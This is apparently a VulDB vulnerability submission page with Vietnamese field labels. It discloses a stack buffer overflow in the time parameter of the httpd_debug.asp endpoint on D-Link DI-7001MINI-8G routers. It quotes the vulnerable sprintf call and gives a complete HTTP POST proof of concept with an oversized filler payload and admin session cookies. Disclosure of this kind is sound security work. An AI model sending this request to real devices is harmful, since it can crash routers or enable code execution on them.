| tiêu đề | D-Link DI-7001MINI-8G <=19.09.19A1 Buffer Overflow |
|---|
| Mô tả | A critical stack-based buffer overflow vulnerability has been identified in D-Link DI-7001MINI-8G devices. The flaw exists in the handling of HTTP POST requests to the httpd_debug.asp endpoint. Specifically, the time parameter is user-controllable and is directly passed to the sprintf function without proper length validation, as demonstrated in the vulnerable code snippet: sprintf(_ret:0_msg:_ok__, "echo \"httpd_debug time %s\" >/dev/console", parm);. By sending a specially crafted, overly long value for this parameter, a remote attacker can overflow the fixed-size buffer. Successful exploitation may lead to a denial of service (DoS) or, under certain circumstances, potential arbitrary code execution.
POC:
POST /httpd_debug.asp HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wysLanguage=CN; userid=admin; gw_userid=admin,gw_passwd=E3A7F1B4C8D2E5F7A0B3C6D9E1F4A7B2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 276
time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb |
|---|
| Nguồn | ⚠️ https://github.com/666324/dlink-DI-7001MINI-8G-vuln |
|---|
| Người dùng | Zheng (UID 97999) |
|---|
| Đệ trình | 11/05/2026 04:02 (cách đây 25 ngày) |
|---|
| Kiểm duyệt | 31/05/2026 16:13 (21 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 367549 [D-Link DI-7001 MINI đến 19.09.19A1 API /httpd_debug.asp sprintf Thời gian tràn bộ đệm] |
|---|
| điểm | 20 |
|---|